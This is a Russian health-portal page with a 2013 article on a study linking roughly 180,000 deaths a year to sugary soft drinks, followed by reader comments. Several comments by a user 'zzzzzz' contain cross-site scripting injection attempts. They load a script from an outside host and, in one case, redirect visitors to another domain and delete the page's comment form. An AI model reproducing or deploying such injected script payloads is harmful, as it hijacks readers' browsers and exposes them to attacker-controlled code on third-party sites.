Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  180 000 смертей в год свя...  >>  180 000 смертей в год связано со сладкими напитками! Как не умереть?
 
Обратная связь
 

180 000 смертей в год связано со сладкими напитками! Как не умереть?

Размер шрифта
24 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Признайтесь, вы ведь любите холодную газировку, не так ли? Результаты недавнего исследования шокируют: тысячи смертей по всему миру связаны именно со злоупотреблением сладкими напитками.

как не умереть от газированных напитков

«Эти данные удивительны как минимум потому, что мы всегда считали, что это проблема развитых стран, таких как США», – говорит Гитанджали Синг, глава исследовательской группы в Гарвардской школе общественного здоровья в Бостоне. По ее словам, результаты этого исследования убедительно свидетельствуют о необходимости введения более жестких мер, регулирующей потребление сладких газированных напитков.

Но сделать это будет непросто. И не только потому, что могучая индустрия газированных напитков будет сопротивляться: куда сложнее будет достучаться до потребителей, которые очень любят газировку и думать не хотят о ее сомнительном составе.

Мнения против

Исследования показывают, что злоупотребление такими напитками ассоциировано с повышенной смертностью от заболеваний сердца, диабета и некоторых опухолей. Но не все признают доказанность этой связи.

Гитанджали Синг возражает: «Конечно, с точки зрения индивидуума важна именно совокупность многих факторов. Но на уровне популяции вполне возможно искать связь между смертностью и потреблением сладких газированных напитков».

Сладкая смерть

Для достижения этой цели, Синг и ее коллеги опирались на национальные базы данных по всему миру, в которых отражено потребление сахара населением. Затем они оценивали, как злоупотребление сладкой газировкой влияет на развитие ожирения. Последний шаг в логической цепочке – влияние ожирения на риск хронических заболеваний и сопутствующей смертности.

В общем и целом, по данным этого исследования в 2010 году примерно 180 000 смертей по всему миру были связаны со злоупотреблением сладкой газировкой, из них 130 000 – от диабета, 45 000 – от сердечно-сосудистых заболеваний и 4 600 – от различных опухолей. При этом выяснилось, что больше всего газировку любят в Латинской Америке и на Кубе в частности: здешние мужчины моложе 45 лет в среднем выпивают более 5 банок в день!

Одна из главных проблем, связанных с газировкой, – это дети и подростки. Они не знают меры, поглощая сладкие напитки литрами, а вместе с ними – бездну калорий. К сожалению, данное исследование оценивало смертность старших категорий населения, а потенциальный вред для детей остался вне поля рассмотрения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Татьяна 43

17 января 2015 в 19:46

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Болезни-террористы. Инфаркт   Шум самолетов вызывает болезни сердца   Что здоровее: кофе молотый и растворимый   Вам назначили новое лекарство. О чем спросить врача?  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 03 декабря 2012Время смерти зависит от того, во сколько вы встаете
 
24 февраля 2012Смерть «по часам» 14 сентября 2011Ожирение не всегда означает проблемы с сердцем
 

Слайдшоу

1
Вся правда об аритмии
Необычные симптомы инфаркта
3 органа-мишени в новом году

Тесты

1
Грозит ли вам инфаркт миокарда?
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.